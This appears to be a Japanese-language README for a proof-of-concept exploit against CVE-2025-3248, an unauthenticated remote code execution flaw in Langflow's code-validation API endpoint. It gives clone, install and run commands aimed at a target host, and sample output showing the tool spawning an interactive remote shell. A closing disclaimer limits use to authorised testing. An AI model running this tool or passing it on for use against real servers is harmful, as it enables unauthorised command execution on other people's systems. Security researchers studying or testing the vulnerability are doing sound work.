
Langflow AI リモートコード実行(認証不要)のエクスプロイト
このエクスプロイトは、Langflow AI の重要な認証不要の RCE 脆弱性 (CVE-2025-3248) を標的としています。この脆弱性により、攻撃者は /api/v1/validate/code エンドポイントを介してターゲットサーバー上で任意のシステムコマンドを実行できます。
この概念実証 (PoC) ツールは、問題のテストと実証のための対話型シェルを提供します。
pip3git clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
対話型シェルが表示されます:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit または quit と入力このプロジェクトはMITライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
このソフトウェアは教育目的および研究目的のみで提供されています。 著者は、このコードの誤用に対していかなる責任も負いません。 所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。